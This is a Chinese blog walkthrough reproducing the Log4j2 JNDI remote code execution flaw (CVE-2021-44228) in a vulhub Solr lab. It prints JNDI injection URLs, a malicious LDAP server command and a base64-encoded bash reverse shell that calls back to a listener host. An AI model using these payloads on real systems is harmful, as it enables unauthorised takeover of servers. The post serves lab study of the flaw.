log4j2远程代码执行getshell(漏洞复现)

最新推荐文章于 2024-09-09 09:45:31 发布
最新推荐文章于 2024-09-09 09:45:31 发布
阅读量550 收藏 8
点赞数 6
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63920195/article/details/141353061
版权

环境介绍

192.168.15.166使用docker搭建漏洞复现环境

192.168.15.129作为接收shell的主机

dnslog测试漏洞是否存在

192.168.15.166:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.thlpcl.dnslog.cn}

会回显版本1.8.0 存在jndi注入漏洞

getshell

有两种方法去写反弹shell

手动构造ladp服务器

编写.java代码构造恶意类

再javac编译成.class文件

把.class文件放到http服务器

这里使用python

在存放.class文件的目录下执行命令

python -m http.server 4444

使用mvn命令清理项目并打包构建成果( Maven 会根据pom.xml文件这些定义自动下载并管理依赖 )同时跳过测试阶段

mvn clean package -DskipTests

执行完就多了一个target目录

里面有标红的两个jar文件即可

使用该命令模拟一个恶意的 LDAP 服务器,监听端口 1389。当目标系统尝试通过 LDAP 获取对象时,它会指向提供的 URL (http://192.168.15.166:4444/#Exploit)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer  "http://192.168.15.166:4444/#Exploit" 1389

然后再去访问

http://192.168.15.166:8983/solr/admin/cores?action=${jndi:ldap://192.168.15.166:1389/Exploit}

执行成功就会反弹shell

JNDI注入工具

安装地址:GitHub - sayers522/JNDI-Injection-Exploit: JNDI命令注入利用

mvn clean package -DskipTests

(maven生成.jar可执行文件,在pom.xml目录下运行)

生成后会多出一个target目录 里面有这两个红色文件就行

写反弹shell

使用Runtime.exec Payload Generater | AresX's Blog (ares-x.com)网站

对反弹shell进行base64编码

在该目录下执行命令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1LjEyOS84ODg4IDA+JjEnCg==}|{base64,-d}|{bash,-i}" -A "192.168.15.166"

执行后会有rmi ladp的服务站点

然后去另一台主机(充当接收shell的主机192.168.15.129)执行监听本地的8888端口

去访问存在jndi注入的漏洞点

这边就会收到日志

同时接收shell的主机也会得到会话 成功getshell

遇到的问题

反弹shell不成功

如果你的docker容器使用的网段(例如 172.x.x.x)与主机的网段(192.168.15.0/24)不同 那么在本地复现就不能够成功反弹shell

解决办法就是将docker容器使用的网段直接使用主机网络 可以使用 host 网络模式 此模式下,容器与主机共享网络命名空间,容器中的应用程序可以直接使用主机的 IP 地址和网络接口

先停止

docker-compose down

然后需要去修改docker-compose.yml文件

这里 由于使用了 host 网络模式 容器将直接使用主机的网络接口。容器内的服务将直接在主机的网络接口上提供服务,无需通过 Docker 端口映射

所以把端口配置注释掉即可

version: '2'
services:
  solr:
    image: vulhub/solr:8.11.0
    network_mode: host
    # 删除 ports 配置
    # ports:
    #   - "8983:8983"
    #   - "5005:5005"

再重新启动即可

docker-compose up -d

后面去访问就是192.168.15.166了

mvn执行报错

如果在执行mvn有报错

mvn clean package -DskipTests

就重新执行几遍

v1nche3
关注
漏洞复现】Apache Log4j2 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-20 935
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行获得目标服务器权限。......
漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 1722
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码
log4j2远程代码执行漏洞原理与漏洞复现
人若无名,便可专心练剑
03-20 1786
在看我写的log4j2远程代码执行漏洞之前,师傅们可以看看我前面写的《JNDI注入原理及利用IDEA漏洞复现》这篇文章,因为log4j2远程代码执行漏洞里面有讲JNDI注入,这样可以对师傅的理解更加深刻也更加容易理解!
log4j 2 远程代码执行漏洞原理与搭建反弹shell
flyingwind2000的博客
09-03 2232
本文讲述log4j 远程代码执行漏洞简单原理, 以及如何详细搭建一台服务器进行测试, 同时使用反弹技术控制与接管靶机. 本文假定阅读者具备一定功底, 如初入门级安全渗透人员, 熟练掌握LINUX, 具备简单java开发经验,且熟练使用工具.
Log4j2漏洞复现
最新发布
hongji728696的博客
09-09 1136
Log4j2是一个用来记录日志的日志记录框架,log4j2在进行日志记录时实现了一个接口JNDI(),接口实现的是lookup方法,该方法具备远程加载对象并将对象动态记录下来的功能,记录的格式是${......},如果不对lookup的记录内容进行限制,就容易被攻击者渗透,并反弹shell
Apache Log4j2远程代码执行漏洞
qq_26622469的博客
12-16 2131
漏洞分析 组件介绍 Apache Log4j2 是一款Java日志框架,是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。由于其易用性被广泛集成于各种服务器和组件中。 漏洞描述 2021年12月9日,深信服安全团队监测到一则Apache Log4j2 组件存在远程代码执行漏洞的信息,并成功复现漏洞漏洞编号:CNVD-2021-95914。漏洞威胁等级:严重。 该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,
【紧急】Apache Log4j2 远程代码执行漏洞
qq_18209847的博客
04-03 4056
0x01 漏洞背景 12月9日,监测到网上披露Apache Log4j2 远程代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可在目标服务器上执行任意代码漏洞PoC已在网上公开,默认配置即可进行利用,该漏洞影响范围极广,建议相关用户尽快采取措施进行排查与防护。 0x02 风险等级 严重 0x03 影响版本 受影响版本: Apache Log4j 2.x < 2.15.0-rc2 0x04 供应链影响范围: 已知受影
Apache log4j2远程代码执行漏洞
持 开源思想,撰 必胜所学,望 勤学者,无难处
05-21 219
该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。此次漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成远程代码执行。2、若项目使用Maven打包,查看项目pom文件是否存在groupId包含log4j的依赖。1、检查Java应用是否引入log4j-api,log4j-core两个jar。1、官方已于2021年12月10日发布新版本修复该漏洞,请尽快升级至安全版本。
Apache Log4j2远程代码执行漏洞
F2444790591的博客
07-08 8024
1、下载、解压、重命名vulhub-master.zip为vulhub 2、进入漏洞环境下,启动该环境。 3、访问目标靶场: 4、在Dnslog.cn中生成接收信息的域名 。 5、提交dnslog payload 参数,进行访问。 6、可以发现dnslog接收到返回的信息,证明存在log4
Apache Log4j2 远程代码执行漏洞
qq_39912230的博客
12-13 3940
· 漏洞描述 Apache Log4j2是一款非常优秀的Java日志框架,在各大Java项目中广泛应用。12月9日,Apache官方发布了紧急安全更新,修复了Apache Log4j2中发现的远程代码执行漏洞。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。漏洞风险评级为严重。 ·影响版本 Apache Log4j
漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞
2301_76225520的博客
04-18 1077
以及 LDAP即轻量级目录访问协议都是名称服务,不同的是 LDAP是一个协议,是和 HTTP 一样是通用的,而不止局限于 JAVA.比如用户对象可以有用户名、密码、邮件地址、角色等属性,计算机对象可以有IP地址、MAC地址、操作系统版本等属性。四个系列:< v1.14.2, < v1.13.5, < v1.12.7, < v1.11.6。而用户可以通过目录服务,针对打印机需求,根据分辨率等属性进行搜索获取符合条件的打印机对象。在名称服务中根据打印机名称获取打印机对象,并进行打印操作。
Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell
Hi~ 土拨鼠
12-16 5136
文章目录1、构造EXP2、使用javac进行编译3、将.class文件放到web根目录下4、使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个ldap的服务5、nc开启监听6、准备工作完毕,上payload7、靶场测试8、成功反弹shell 最近log4j2可谓是无人不知无人不晓,出去吹牛不知道这个还好意思说自己是做安全的嘛!今天我就来复现一下 1、构造EXP import java.io.BufferedReader; import java.io.InputStream; i
Apache Log4j2 远程代码执行 漏洞
马春林的专栏
12-10 3466
log4j安全漏洞
灭世之Apache Log4j2 远程代码执行漏洞
tangshuangsss的专栏
12-11 437
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介网上披露Apache Log4j2 远程代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功...
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 2318
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
Apache Log4j2 远程代码执行漏洞复现 (CVE-2021-44228)
qq_44433172的博客
06-24 1288
Apache Log4j 远程代码执行漏洞 (CVE-2021-44228)
Apache Log4j2 远程代码执行漏洞分析
小小猪的博客
12-20 328
Apache Log4j2 远程代码执行漏洞分析 漏洞简介: ApacheLog4j2是一个基于Java的日志记录工具。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 漏洞适用版本为2.0 <= Apache log4j2 <= 2.14.1,只需检测Java应用是否引入 .
Apache Log4j2 远程代码执行漏洞 学习
YouthBelief的博客
12-12 3525
Apache Log4j0x00 前言0x01 漏洞描述0x02 影响范围0x03 环境搭建0x04 漏洞复现0x05 修复方法0x06 总结 所有文章,仅供安全研究与学习之用,后果自负! 0x00 前言 Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。 0x01 漏洞描述 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配
apache log4j2远程代码执行漏洞检测工具
08-31
Apache Log4j2远程代码执行漏洞是一种影响Apache Log4j2日志记录库的严重安全漏洞。该漏洞允许攻击者通过发送特制的网络请求,远程执行任意代码,导致服务器完全被控制。 为了帮助检测这个漏洞,一些安全公司和社区...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值